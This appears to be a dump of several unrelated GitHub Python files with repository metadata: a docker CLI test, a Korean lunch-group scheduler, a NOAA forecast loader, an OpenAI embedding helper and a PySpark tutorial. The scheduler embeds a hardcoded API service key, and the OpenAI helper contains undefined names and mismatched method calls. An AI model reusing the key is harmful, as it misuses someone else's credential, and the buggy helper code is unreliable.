invoke(docker.follow)
m_sh.assert_called_with('SUDO docker compose logs --follow ')
def test_kill(m_utils, m_sh):
invoke(docker.kill)
m_sh.assert_called_once_with('SUDO docker rm --force $(SUDO docker ps -aq)', check=False)
m_sh.reset_mock()
m_sh.return_value = ''
invoke(docker.kill, '--zombies')
assert m_sh.call_count == 2
m_sh.reset_mock()
m_sh.return_value = '\n'.join([
'Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name',
'tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 5990/docker-proxy',
'tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 1632/systemd-resolv',
'tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1787/sshd: /usr/sbi',
'tcp 0 0 0.0.0.0:1883 0.0.0.0:* LISTEN 138969/docker-proxy',
])
invoke(docker.kill, '--zombies')
assert m_sh.call_count == 5
m_sh.reset_mock()
m_utils.command_exists.return_value = False
invoke(docker.kill, '--zombies')
assert m_sh.call_count == 1
| BrewBlox/brewblox-ctl | test/commands/test_docker.py | test_docker.py | py | 2,291 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "brewblox_ctl.commands.docker.__name__",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "brewblox_ctl.commands.docker",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "pytest.fixture",
"line_number": 13,
"usage_type": "attribute"
}... |
26264738548 | # import member
import datetime as dt
import random
from member import Member
import requests
import json
import pandas as pd
from pandas import json_normalize
from tkinter import *
import numpy as np
class KoreaHolidays:
def get_holidays(self):
today = dt.datetime.today().strftime("%Y%m%d")
today_year = dt.datetime.today().year
KEY = "pKHtIPLJIFBsdudPWOIF4TEBHnwirJTRIdp7GFfIpKiRTLfHcWWWaPKMATdA9W%2BNFIUt6fd0aPkuoQl1hkKMUw%3D%3D"
url = (
"http://apis.data.go.kr/B090041/openapi/service/SpcdeInfoService/getRestDeInfo?_type=json&numOfRows=50&solYear="
+ str(today_year)
+ "&ServiceKey="
+ str(KEY)
)
response = requests.get(url)
if response.status_code == 200:
json_ob = json.loads(response.text)
holidays_data = json_ob["response"]["body"]["items"]["item"]
dataframe = json_normalize(holidays_data)
# dateName = dataframe.loc[dataframe["locdate"] == int(today), "dateName"]
# print(dateName)
return dataframe["locdate"].to_list()
def today_is_holiday(self):
_today = dt.datetime.now().strftime("%Y%m%d")
holidays = self.get_holidays()
return holidays
localToday = dt.datetime.now()
# 날짜설정 완료
# print("localToday.weekday : " + str(localToday.weekday()))
# 공휴일 조건 빼주기
# 공휴일 배열 = holidays
KH = KoreaHolidays()
holidays = KH.today_is_holiday()
for i in holidays: # 공휴일 조건
if i == localToday:
localToday = localToday + dt.timedelta(days=1)
while True: # 금토일 조건도 빼주기
if localToday.weekday() <= 3:
break;
localToday = localToday + dt.timedelta(days=1)
while True: # 금토일 조건도 빼주기
if localToday.weekday() <= 3:
break;
localToday = localToday + dt.timedelta(days=1)
##################################### 함수만들기
def holidayCalculateAndPlus(lt) :
localToday = lt + dt.timedelta(days=1)
for i in holidays: # 공휴일 조건
if i == localToday:
localToday = localToday + dt.timedelta(days=1)
while True: # 금토일 조건도 빼주기
if localToday.weekday() <= 3:
break;
localToday = localToday + dt.timedelta(days=1)
while True: # 금토일 조건도 빼주기
if localToday.weekday() <= 3:
break;
localToday = localToday + dt.timedelta(days=1)
return localToday
#####################################
# 팀목록 가져와서 섞어주기
teamList = []
for value in Member.member:
if (value["team"] not in teamList):
teamList.append(value["team"])
random.shuffle(teamList)
oldMemberList = Member.member
newMemberLIst = []
team = list([] for i in range(0,len(teamList)))
# 팀 나눠주기
for i in range(0,len(teamList)):
for oldMember in oldMemberList:
if oldMember["team"]==teamList[i]:
team[i].append(oldMember)
# arr0.append(oldMember) # team이 MK인 member만 담긴다.
# print("team" + str(i) + " : " + str(team[i]))
teamArr = []
for i in range(0,len(teamList)):
teamArr.append(team[i])
##################################################################################
# 팀에서 랜덤으로 하나씩 뽑기
# teamSearchedResult = list(0 for i in range(0, len(teamList)))
total = 0
while True:
# 섞어주기
random.shuffle(teamArr)
teamSearchedResult = list(0 for i in range(0, len(teamArr)))
# print("teamArr : " + str(teamArr))
# print("teamSearchedResult : " + str(teamSearchedResult))
for i in range(0,len(teamArr)):
if len(teamArr[i]) != 0: # 팀이 멤버가 있다면 뽑아라
ranMember = random.choice(teamArr[i])
newMemberLIst.append(ranMember)
teamArr[i].remove(ranMember)
elif len(teamArr[i]) == 0: # 팀에서 다 뽑았으면
teamSearchedResult[i] = 1
if 0 not in teamSearchedResult:
break
# print("섞은 MemberList : " + str(newMemberLIst))
# newMemberList에서 4명씩 혹은 3명씩 나눠서 일자에 배치해주자
size = len(newMemberLIst) # 18개 그대로 나온다 (-1 안되고 나온다)
calResult = divmod(size, 4)
# print("몫 : " + str(calResult[0]))
# print("나머지 : " + str(calResult[1]))
print("총인원 : " + str(size))
finalOutput = []
output = {"date":[],"person":[]} # key value여야하고
person = [] # 리스트
def saveFinalOutput(localToday, person):
output["date"].append(localToday.strftime("%Y-%m-%d")) #### A타입
output["person"].append(person)
finalOutput.append(output)
if calResult[1] == 1:
if calResult[0] == 0: # 나머지 1, 몫 0 인경우 (총인원: 1)
for i in range(size): # 예를들면 size=5, i=0,1,2,3, ...
person.append(newMemberLIst[i])
saveFinalOutput(localToday, person)
elif calResult[0] == 1: # 나머지 1, 몫 1 인경우 (총인원: 5)
for i in range(size): # 예를들면 size=5, i=0,1,2,3, ...
person.append(newMemberLIst[i])
if i == size - 3:
# person.append(newMemberLIst[i])
saveFinalOutput(localToday, person)
person = [] #### B타입
output = {"date": [], "person": []}
# 날짜를 +1 시켜줘야한다.
localToday = holidayCalculateAndPlus(localToday)
elif i == size - 1:
saveFinalOutput(localToday, person)
elif i > size - 3:
pass
elif calResult[0] == 2: # 나머지 1, 몫 2 인경우 (총인원: 9)
for i in range(size): # 예를들면 17명일때 size=17, i=0,1,2,3, ...
person.append(newMemberLIst[i])
if i == size - 4 or i == size - 7:
# person.append(newMemberLIst[i])
saveFinalOutput(localToday, person)
person = [] #### B타입
output = {"date": [], "person": []}
# 날짜를 +1 시켜줘야한다.
localToday = holidayCalculateAndPlus(localToday)
elif i == size - 1:
saveFinalOutput(localToday, person)
elif i > size - 4:
pass
else: # 나머지가 1인 일반적인 경우 (마지막 그룹을 3명,3명,3명 으로 묶는다)
for i in range(size): # 예를들면 17명일때 size=17, i=0,1,2,3, ...
person.append(newMemberLIst[i])
if i == size - 7:
# person.append(newMemberLIst[i])
saveFinalOutput(localToday, person)
person = [] #### B타입
output = {"date": [], "person": []}
# 날짜를 +1 시켜줘야한다.
localToday = holidayCalculateAndPlus(localToday)
elif i == size - 4:
# person.append(newMemberLIst[i])
saveFinalOutput(localToday, person)
person = [] #### B타입
output = {"date": [], "person": []}
# 날짜를 +1 시켜줘야한다.
localToday = holidayCalculateAndPlus(localToday)
elif i == size - 1:
saveFinalOutput(localToday, person)
elif i > size - 7:
pass
elif (i + 1) != 1 and ((i + 1) % 4) == 0:
# person.append(newMemberLIst[i])
saveFinalOutput(localToday, person)
person = [] #### B타입
output = {"date": [], "person": []}
# 날짜를 +1 시켜줘야한다.
localToday = holidayCalculateAndPlus(localToday)
elif calResult[1] == 2: # 나머지=2
if calResult[0] == 0: # 나머지 2, 몫 0 인경우 (총인원: 2)
for i in range(size):
person.append(newMemberLIst[i])
if i == size - 1:
saveFinalOutput(localToday, person)
elif calResult[0] == 1: # 나머지 2, 몫 1 인경우 (총인원: 6)
for i in range(size):
person.append(newMemberLIst[i])
if i == size - 4:
# person.append(newMemberLIst[i])
saveFinalOutput(localToday, person)
person = [] #### B타입
output = {"date": [], "person": []}
# 날짜를 +1 시켜줘야한다.
localToday = holidayCalculateAndPlus(localToday)
elif i == size - 1:
saveFinalOutput(localToday, person)
elif i > size - 4:
pass
else: # 나머지가 2인 일반적인 경우 -> 마지막 그룹을 3명, 3명으로 묶는다.
for i in range(size):
person.append(newMemberLIst[i])
if i == size - 4:
# person.append(newMemberLIst[i])
saveFinalOutput(localToday, person)
person = [] #### B타입
output = {"date": [], "person": []}
# 날짜를 +1 시켜줘야한다.
localToday = holidayCalculateAndPlus(localToday)
elif i == size - 1:
saveFinalOutput(localToday, person)
elif i > size - 4:
pass
elif (i + 1) != 1 and ((i + 1) % 4) == 0:
# person.append(newMemberLIst[i])
saveFinalOutput(localToday, person)
person = [] #### B타입
output = {"date": [], "person": []}
# 날짜를 +1 시켜줘야한다.
localToday = holidayCalculateAndPlus(localToday)
elif calResult[1] == 3: # 나머지=3
if calResult[0] == 0: # 나머지 3, 몫 0 인경우 (총인원: 3)
for i in range(size):
person.append(newMemberLIst[i])
if i == size - 1:
saveFinalOutput(localToday, person)
else: # 나머지가 3인 일반적인 경우
for i in range(size): # size : 11 , i=0,1,2,3,4,5,6,7,8,9,10
person.append(newMemberLIst[i])
if i == size - 4:
# person.append(newMemberLIst[i])
saveFinalOutput(localToday, person)
person = [] #### B타입
output = {"date": [], "person": []}
# 날짜를 +1 시켜줘야한다.
localToday = holidayCalculateAndPlus(localToday)
elif i == size - 1:
saveFinalOutput(localToday, person)
elif i > size - 4:
pass
elif (i + 1) != 1 and ((i + 1) % 4) == 0:
# person.append(newMemberLIst[i])
saveFinalOutput(localToday, person)
person = [] #### B타입
output = {"date": [], "person": []}
# 날짜를 +1 시켜줘야한다.
localToday = holidayCalculateAndPlus(localToday)
elif calResult[1] == 0:
for i in range(size): # size : 11 , i=0,1,2,3,4,5,6,7,8,9,10
person.append(newMemberLIst[i])
if (i + 1) != 1 and ((i + 1) % 4) == 0:
# person.append(newMemberLIst[i])
saveFinalOutput(localToday, person)
person = [] #### B타입
output = {"date": [], "person": []}
# 날짜를 +1 시켜줘야한다.
localToday = holidayCalculateAndPlus(localToday)
print("[결과 - 중복 제거작업 전]")
for finalOutputDetail in finalOutput:
print(finalOutputDetail)
# 한 날짜에 중복된 팀이 있다면, 다음 날짜의 팀원들과 바꿔주기
for i in range(len(finalOutput)):
# print(str(i) + "째날")
list = []
list2 = []
for j in range(len(finalOutput[i]["person"][0])): # i번째날 우정의밥멤버수만큼 반복 -> j번째
# print("dddd" + str(j))
# print(finalOutput[i]["person"][0][j]["team"]) # MK
# print(finalOutput[i]["person"][0]) # [{'name': '바바바', 'team': 'MK'}, {'name': '최상수', 'team': 'MK'}, {'name': '유단비', 'team': 'MK'}]
# print(finalOutput[i]["person"][0][j]) # {'name': '최상수', 'team': 'MK'}
list.append(finalOutput[i]["person"][0][j]["team"])
if ((i+1) != len(finalOutput)): # 마지막 i번째가 아닐때
for z in range(len(finalOutput[i+1]["person"][0])): # i번째날 우정의밥멤버수만큼 반복 -> j번째
list2.append(finalOutput[i+1]["person"][0][z]["team"])
else:
pass
duplicatedMember = {}
q = 0
resultbol = False
while q < len(finalOutput[i]["person"][0]):
# 한날짜에 같은팀이 존재하는지? -> duplicated에 저장
dup = [x for i, x in enumerate(list) if i != list.index(x)] # duplicated에 해당하는 멤버를 아무나 뽑아서, i+1 번째 duplicated에 해당하지 않는 멤버와 바꾼다. (duplicated = 중복된 팀 멤버의 팀이름)
# 다음날짜
dup2 = [x for i, x in enumerate(list2) if i != list2.index(x)] # print("finalOutput[i][person][0][j][team] : " + str(finalOutput[i]["person"][0][j]["team"])) # MK
if dup!=[]:
if finalOutput[i]["person"][0][q]["team"]==dup[0]: # 중복된게 있다면
duplicatedMember = finalOutput[i]["person"][0][q] # duplicated = 팀중복의 멤버에 담고
if dup2 != []: # 다음날짜에도 중복된 인원이 있다면? -> 그 인원을 뽑아서 현재날짜의 중복된 인원과 바꿔준다.
if (i+1) != len(finalOutput):
w = 0
while w < len(finalOutput[i+1]["person"][0]):
# for a in range(len(finalOutput[i+1]["person"][0])): # 그 멤버로 뽑는다.
if finalOutput[i+1]["person"][0][w]["team"] == dup2[0]:
duplicatedMember2 = finalOutput[i+1]["person"][0][w] # duplicated = 팀중복의 멤버
finalOutput[i]["person"][0][q] = duplicatedMember2
finalOutput[i+1]["person"][0][w] = duplicatedMember
resultbol = True
break
w += 1
else: # 다음날짜에도 중복된 인원이 없다면?? -> 그래도 바꿔준다.
w = random.randint(0,len(finalOutput[i + 1]["person"][0]))
duplicatedMember2 = finalOutput[i + 1]["person"][0][w] # duplicated = 팀중복의 멤버 ####### w는 랜덤으로 뽑은 숫자 (finalOutput[i + 1]["person"][0]의 len)
finalOutput[i]["person"][0][q] = duplicatedMember2
finalOutput[i + 1]["person"][0][w] = duplicatedMember
q += 1
if resultbol:
break
if resultbol:
break
print("[최종결과]")
for finalOutputDetail in finalOutput:
print(finalOutputDetail)
# # 예제2) 버튼만들기
# tk = Tk()
# # 함수 정의 (버튼을 누르면 텍스트 내용이 바뀜)
# def event():
# button['text'] = '버튼 누름!'
#
# button = Button(tk,text='버튼입니다. 누르면 함수가 실행됩니다.',command=event)
# button2 = Button(tk,text='버튼2 입니다.')
# button.pack(side=LEFT,padx=10,pady=10) #side로 배치설정, padx로 좌우 여백설정, pady로 상하 여백설정
# button2.pack(side=LEFT, padx=10, pady= 10)
# tk.mainloop()
#
# localToday = localToday.strftime("%Y-%m-%d")
# print(localToday)
# 오늘 날짜부터 가져와야함
| intacka/friendshipRice | main.py | main.py | py | 16,078 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.datetime.today",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "datetime.datetime.today",
"line_number": 18,
"usage_type": "call"
},
{
"api_name":... |
826465711 | """
:Product: three_day_forecast.txt
:Issued: 2012 Dec 12 1235 UTC
# Prepared by the U.S. Dept. of Commerce, NOAA, Space Weather Prediction
Center
#
A. NOAA Geomagnetic Activity Observation and Forecast
The greatest observed 3 hr Kp over the past 24 hours was 1 (below NOAA
Scale levels).
The greatest expected 3 hr Kp for Dec 12-Dec 14 2012 is 3 (below NOAA
Scale levels).
NOAA Kp index breakdown Dec 12-Dec 14 2012
Dec 12 Dec 13 Dec 14
00-03UT 0 2 2
03-06UT 0 1 2
06-09UT 1 1 0
09-12UT 0 1 1
12-15UT 1 1 1
15-18UT 1 1 1
18-21UT 2 3 2
21-00UT 2 3 2
Rationale: Expecting predominately quiet conditions throughout the
forecast period. A chance for unsettled conditions exists late on 13 Dec
as a negative polarity coronal hole/high speed stream becomes
geoeffective. No NOAA scale G1 or greater storms expected.
B. NOAA Solar Radiation Activity Observation and Forecast
Solar radiation, as observed by NOAA GOES-13 over the past 24 hours, was
below S-scale storm level thresholds.
Solar Radiation Storm Forecast for Dec 12-Dec 14 2012
Dec 12 Dec 13 Dec 14
S1 or greater 1% 1% 1%
Rationale: No NOAA scale S1 or greater storms are expected.
C. NOAA Radio Blackout Activity and Forecast
No radio blackouts were observed over the past 24 hours.
Radio Blackout Forecast for Dec 12-Dec 14 2012
Dec 12 Dec 13 Dec 14
R1-R2 1% 1% 1%
R3 or greater 1% 1% 1%
Rationale: No NOAA scale R1 or greater storms are expected.
"""
#!/usr/bin/python
# -*- coding: utf-8 -*-
import requests
import collections
import datetime
import json
import os, sys
import django
urlwithfile = "http://services.swpc.noaa.gov/text/3-day-forecast.txt"
r = requests.get(urlwithfile)
rlines = r.text.split("\n")
adate=rlines[1].split(":")[2].strip()
referencedatetime = datetime.datetime.strptime(adate, '%Y %b %d %H%M %Z')
basedate = datetime.datetime(year=referencedatetime.year,month=referencedatetime.month,day=referencedatetime.day,hour=0,minute=0)
delta3h = datetime.timedelta(hours=3)
delta1d = datetime.timedelta(days=1)
ARationalestart = r.text.find("Rationale",0)
ARationaleend = r.text.find("B",ARationalestart)
BRationalestart = r.text.find("Rationale",ARationaleend)
BRationaleend = r.text.find("C",BRationalestart)
CRationalestart = r.text.find("Rationale",BRationaleend)
CRationaleend = -1
proj_path = "/srv/spaceweather/git/spaceweather/src/spaceweather/"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "spaceweather.settings")
sys.path.append(proj_path)
os.chdir(proj_path)
from core.models import *
# GEOMAGNETIC ACTIVITY
geomagneticdaytimes = []
for line in rlines:
if line.find("UT ") > -1:
geomagneticdaytimes.append(line)
"""
Feb 14 Feb 15 Feb 16
00-03UT 3 5 (G1) 3
03-06UT 3 5 (G1) 4
06-09UT 3 4 3
09-12UT 2 4 3
12-15UT 2 4 2
15-18UT 2 3 2
18-21UT 3 3 1
21-00UT 5 (G1) 2 2
"""
deltanumber = 0
for line in geomagneticdaytimes:
tempvalues = line.split()[1:]
values = []
for v in tempvalues:
try:
int(v)
values.append(v)
except:
pass
for day in range(3):
dt = basedate+(delta1d*day)+(delta3h*deltanumber)
try:
Geomagactivity.objects.get(date=dt)
print("Data for {} already there!".format(dt))
except:
value = values[day]
g = Geomagactivity(date=dt,value=value,bogus=False)
g.save()
print("Data for {} inserted!".format(dt))
deltanumber+=1
geomagrationale = r.text[ARationalestart:ARationaleend].split("Rationale: ")[1]
# SOLAR RADIATION
basedate = datetime.date(year=referencedatetime.year,month=referencedatetime.month,day=referencedatetime.day)
# R1-R2
solarradiation = ""
for line in rlines:
if line.find("S1 or greater") > -1:
solarradiation = line
break
values = solarradiation.split()[3:]
for day in range(3):
dt = basedate+(delta1d*day)
try:
Solarradiation.objects.get(date=dt)
print("Data for {} already there!".format(dt))
except:
srt = Solarradiationtype.objects.get(name="S1 or greater")
value = int(values[day][:-1])
s = Solarradiation(date=dt, value=value, solarradiationtype=srt, bogus=False)
s.save()
print("Data for {} inserted!".format(dt))
solarradiationrationale = r.text[BRationalestart:BRationaleend].split("Rationale: ")[1]
# RADIO BLACKOUT
basedate = datetime.date(year=referencedatetime.year,month=referencedatetime.month,day=referencedatetime.day)
radioblackout = ""
for line in rlines:
if line.find("R1-R2") > -1:
radioblackout = line
break
if len(radioblackout) > 0:
values = radioblackout.split()[1:]
for day in range(3):
dt = basedate+(delta1d*day)
try:
Radioblackout.objects.get(date=dt)
print("Data for {} already there!".format(dt))
except:
rbt = Radioblackouttype.objects.get(name="R1-R2")
value = int(values[day][:-1])
rb = Radioblackout(date=dt, value=value, radioblackouttype=rbt, bogus=False)
rb.save()
print("Data for {} inserted!".format(dt))
radioblackout = ""
for line in rlines:
if line.find("R3 or greater") > -1:
radioblackout = line
break
if len(radioblackout) > 0:
values = radioblackout.split()[1:]
for day in range(3):
dt = basedate+(delta1d*day)
try:
Radioblackout.objects.get(date=dt)
print("Data for {} already there!".format(dt))
except:
rbt = Radioblackouttype.objects.get(name="R3 or greater")
value = int(values[day][:-1])
rb = Radioblackout(date=dt, value=value, radioblackouttype=rbt, bogus=False)
rb.save()
print("Data for {} inserted!".format(dt))
radioblackoutrationale = r.text[CRationalestart:CRationaleend].split("Rationale: ")[1]
# FORECAST RATIONALE
basedate = datetime.datetime(year=referencedatetime.year,month=referencedatetime.month,day=referencedatetime.day,hour=0,minute=0)
try:
Forecastrationale.objects.get(date=basedate)
print("Data for {} already there!".format(basedate))
except:
fr = Forecastrationale(date=basedate, radioblackout=radioblackoutrationale, solarradiation=solarradiationrationale, geomagactivity=geomagrationale)
fr.save()
print("Data for {} inserted!".format(dt))
| diacritica/spaceweather | misc/scripts/load3dayforecast.py | load3dayforecast.py | py | 6,924 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.strptime",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 72,
"usage_type": "attribute"
},
{
"api_name": "dateti... |
38834210088 | import hashlib
import os
import time
import jsonlines
import openai
import tiktoken
import json
import tqdm
import numpy as np
from numpy.linalg import norm
from pathlib import Path
from .utils import SaveUtils
from .ai_openai import OpenAI
class OpenAIEmbedding:
openAI = OpenAI()
def __init__(self):
pass
def getSummary(self, chunk):
content = "The following is a passage fragment. Please summarize what information the readers can take away from it:"
content += "\n" + chunk
messages = [
{"role": "user", "content": content}
]
summary = self.openAI._chatMessages(messages)[0]
return summary
def getInfo(self, info, text, chunk_sz = 700, max_memory = 100):
text = text.replace("\n", " ").split()
print(f'Text: {text}')
# raise error if the anticipated api usage is too massive
if (len(text) / chunk_sz) >= max_memory:
raise ValueError("Processing is aborted due to high anticipated costs.")
summaries = []
for idx in tqdm(range(0, len(text), chunk_sz)):
chunk = " ".join(text[idx: idx + chunk_sz])
checkSize = OpenAI.getTokenUsage(chunk)
if checkSize > chunk_sz * 3:
print(f"Skipped an uninformative chunk {checkSize}. {chunk}")
a = input("Continue ? ")
if a != '':
raise
attempts = 0
while True:
try:
summary = self.getSummary(chunk)
embd = self.openAI._embedding(chunk)
summary_embd = self.openAI._embedding(summary)
item = {
"id": len(info),
"text": chunk,
"embd": embd,
"summary": summary,
"summary_embd": summary_embd,
}
info.append(item)
time.sleep(3) # up to 20 api calls per min
summaries.append(summary)
break
except Exception as e:
attempts += 1
if attempts >= 3:
raise Exception(f"{str(e)}")
time.sleep(3)
return summaries
def storeInfo(self, text, memory_path, chunk_sz = 700, max_memory = 100):
if memory_path == '':
print(f'Invalid path : {memory_path}')
return
info = []
summaries = ['Start', 'End']
while len(summaries) >= 2:
summaries = self.getInfo(info, text, chunk_sz, max_memory)
print(summaries)
print(f'size of summaries: {len(summaries)}')
i = input('Continue ? (anytext) ')
if i == '':
break
text = "\r\n\r\nSummary about above arcticle here: " + " ".join(summaries)
with jsonlines.open(memory_path, mode="w") as f:
f.write(info)
print(f"Finish storing info in {memory_path}")
def load_info(self, memory_path):
with jsonlines.open(memory_path, 'r') as jsonl_f:
for line in jsonl_f:
info = line
return info
def retrieve(q_embd, info):
# return the indices of top three related texts
text_embds = []
summary_embds = []
for item in info:
text_embds.append(item["embd"])
summary_embds.append(item["summary_embd"])
# compute the cos sim between info_embds and q_embd
text_cos_sims = np.dot(text_embds, q_embd) / (norm(text_embds, axis=1) * norm(q_embd))
summary_cos_sims = np.dot(summary_embds, q_embd) / (norm(summary_embds, axis=1) * norm(q_embd))
cos_sims = text_cos_sims + summary_cos_sims
top_args = np.argsort(cos_sims).tolist()
top_args.reverse()
indices = top_args[0:3]
return indices
def chatGPT_query(self, user, assistant):
content = "Please summarize what information the readers can take away from it: Must not write 'the readers can take away from it' from begining. Must not write 'the readers can take away from it'. Must write in Korean"
content += "\n" + user
messages = [
{"role": "user", "content": content}
]
if assistant != "":
messages.append(
{"role": "assistant", "content": assistant}
)
return self.openAI._chatMessages(messages)[0]
# You are a very enthusiastic Diginormad who loves to help people! Given the following sections from the documentation, answer the qeuestion using only that information, outputted in mardown format. If you are unsure and the answer is not explicity written in the documentation, say "Sorry I don't know how to help with that"
# Context sections:
# {contextText}
# Question: """
# {query}
# """
# Answer as markdown (including related code snippets if available)
def get_qa_content(self, q, retrieved_text):
content = "After reading some relevant passage fragments from the same document, please respond to the following query. Note that there may be typographical errors in the passages due to the text being fetched from a PDF file or web page."
content += "\nQuery: " + q
for i in range(len(retrieved_text)):
content += "\nPassage " + str(i + 1) + ": " + retrieved_text[i]
content += "\nAvoid explicitly using terms such as 'passage 1, 2 or 3' in your answer as the questioner may not know how the fragments are retrieved. Please use the same language as in the query to respond."
return content
def generate_answer(self, q, retrieved_indices, info):
while True:
sorted_indices = sorted(retrieved_indices)
retrieved_text = [info[idx]["text"] for idx in sorted_indices]
content = self.get_qa_content(q, retrieved_text)
if len(tokenizer.encode(content)) > 3800:
retrieved_indices = retrieved_indices[:-1]
print("Contemplating...")
if not retrieved_indices:
raise ValueError("Failed to respond.")
else:
break
messages = [
{"role": "user", "content": content}
]
answer = self.openAI._chatMessages(messages)[0]
return answer
def memorize(self, text):
sha = hashlib.sha256(text.encode('UTF-8')).hexdigest()
dirs = [f'/content/memory/', f'/content/drive/MyDrive/embed/memory/']
file_exists = False
memory_path = ''
for dir in dirs:
Path(dir).mkdir(parents=True, exist_ok=True)
path = f"{dir}{sha}.json"
if memory_path == '':
memory_path = path
file_exists |= os.path.exists(path)
if file_exists:
memory_path = path
print(f"Detected cached memories in {memory_path}")
if not file_exists:
print("Memorizing...")
self.store_info(text,memory_path)
return memory_path
def answer(self, q, info):
q_embd = self.openAI._embedding(q, model="text-embedding-ada-002")
retrieved_indices = self.retrieve(q_embd, info)
answer = self.generate_answer(q, retrieved_indices, info)
return answer
def chat(self, memory_path):
info = self.load_info(memory_path)
while True:
q = self.get_question()
if len(tokenizer.encode(q)) > 200:
raise ValueError("Input query is too long!")
attempts = 0
while True:
try:
response = self.answer(q, info)
print()
print(f"{response}")
print()
time.sleep(3) # up to 20 api calls per min
break
except Exception as e:
attempts += 1
if attempts >= 1:
raise Exception(f"{str(e)}")
time.sleep(3) | doum1004/diginomard-make-it-rain-blog | diginomard_toolkit/ai_openai_embed.py | ai_openai_embed.py | py | 8,260 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "ai_openai.OpenAI",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "ai_openai.OpenAI.getTokenUsage",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "ai_openai.OpenAI",
"line_number": 39,
"usage_type": "name"
},
{
"api_name": "time... |
15807172488 | # --------------------------------------------------------
# PYTHON PROGRAM
# Here is where we are going to define our set of...
# - Imports
# - Global Variables
# - Functions
# ...to achieve the functionality required.
# When executing > python 'this_file'.py in a terminal,
# the Python interpreter will load our program,
# but it will execute nothing yet.
# --------------------------------------------------------
import pyspark
import shutil
import os
# ------------------------------------------
# FUNCTION process_line
# ------------------------------------------
def process_line(line, bad_chars):
# 1. We create the output variable
res = []
# 2. We clean the line by removing the bad characters
for c in bad_chars:
line = line.replace(c, '')
# 3. We clean the line by removing each tabulator and set of white spaces
line = line.replace('\t', ' ')
line = line.replace(' ', ' ')
line = line.replace(' ', ' ')
line = line.replace(' ', ' ')
# 4. We clean the line by removing any initial and final white spaces
line = line.strip()
line = line.rstrip()
# 5. We split the line by words
words = line.split(" ")
# 6. We append each valid word to the list
for word in words:
if (word != ''):
if ((ord(word[0]) > 57) or (ord(word[0]) < 48)):
res.append(word)
# 7. We return res
return res
# ------------------------------------------
# FUNCTION process_word
# ------------------------------------------
def process_word(word):
# 1. We create the output variable
res = ()
# 2. We create a couple of extra variables
val1 = word[0].lower()
val2 = len(word)
# 3. We assign res properly
res = (val1, val2)
# 4. We return res
return res
# ------------------------------------------
# FUNCTION my_main
# ------------------------------------------
def my_main(sc, my_dataset_dir, my_result_dir, bad_chars):
# 1. Operation C1: Creation 'textFile', so as to store the content of the dataset contained in the folder dataset_dir into an RDD.
# If the dataset is big enough, its content is to be distributed among multiples nodes of the cluster.
# The operation reads the files of the folder line by line. Thus, each item of the RDD is going to be a String (the content of the line being read).
# C1: textFile
# dataset -------------> inputRDD --- RDD items are String ---
inputRDD = sc.textFile(my_dataset_dir)
# 2. Operation T1: Transformation 'flatMap', so as to get a new RDD ('allWordsRDD') with all the words of inputRDD.
# We apply now a lambda expression as F to bypass each item of the collection to our actual filtering function F2 requiring more than
# one argument. The function F2 is process_line, which cleans the lines from all bad_chars and splits it into a list of words.
# We apply flatMap instead of map as we are not interested in the words of each line, just the words in general.
# Thus, map would have given us an RDD where each item had been a list of words, the list of words on each line (i.e., each item had been [String]).
# On the other hand, flatMap allows us to flat the lists and get instead an RDD where each item is a String, a word of the dataset.
# C1: textFile
# dataset -------------> inputRDD --- RDD items are String ---
# |
# | T1: flatMap
# |------------> all_wordsRDD --- RDD items are String ---
allWordsRDD = inputRDD.flatMap(lambda x: process_line(x, bad_chars))
# 3. Operation T2: Transformation 'map', so as to get a new RDD ('pairWordsRDD') with a pair (letter, length of word) per word of the dataset.
# Having the entire word for each word of the dataset is useless for us. Indeed, what we are interested into is just:
# - The first letter (as we are outputting the average length per letter of the alphabet in the solution later on).
# - The length of the word itself (as it is useful to us to compute such this average size).
# Also, moving from an RDD it single String items into one of pairs (key, value) with key the letter and value the length of the word seems to be
# a step in the right direction, as later one we can manipulate this (key, value) pairs with some of the pair RDD transformations and actions.
# C1: textFile
# dataset -------------> inputRDD --- RDD items are String ---
# |
# | T1: flatMap
# |------------> allWordsRDD --- RDD items are String ---
# |
# | T2: map
# | ---------> pairWordsRDD --- RDD items are (char, int) ---
pairWordsRDD = allWordsRDD.map(process_word)
# 4. Operation T3: Transformation 'combineByKey', so as to get a new RDD ('letterTotalInfo') with a pair (letter, (num_letters, num_words)) per
# letter of the alphabet.
# The transformation operation 'combineByKey' requires as arguments 3 functions:
# F1: To be applied in parallel to each node of the cluster.
# The function is responsible of answering this question:
# How do you want Spark to process the first (key, value) pair for each key k ?
# If a node contains 1000 entries (key, value) with key 'k', F1 will only be applied once, for the first (key, value) found.
# F1 must receive as input 1 parameter: The value of the (key, value) pair.
# F1 must produce as an output 1 parameter: The accumulator accum generated for the pair (key, accum), created after
# processing the first (key, value).
# F2: To be applied in parallel to each node of the cluster.
# The function is responsible of answering this question:
# How do you want Spark to process all (key, value) pairs for each key k after having processed the first one and have got an accumulator ?
# If a node contains 1000 entries (key, value) with key 'k', F2 will be applied 999 times, for all except the first (key, value) found.
# F2 must receive as input 2 parameters:
# - The accumulor generated until now.
# - The value of the new (key, value) pair being found.
# F2 must produce as an output 1 parameter: The updated accumulator, after aggregating it with the new (key, value) being found.
# F3: To be applied as a whole single process through all nodes of the cluster.
# The function is responsible of answering this question:
# How do you want Spark to process all (key, accumulator) pairs so as to get a whole single (key, accumulator) pair ?
# If combineByKey is applied to n nodes, F3 will be applied n-1 times, to merge all accumulators under a single accumulator.
# F3 must receive as input 2 parameters:
# - The meta-accumulor generated until now.
# - The accumulator generated by node i, being processed now.
# F3 must produce as an output 1 parameter: The updated accumulator, after aggregating it with the new (key, accumulator) being found.
# C1: textFile
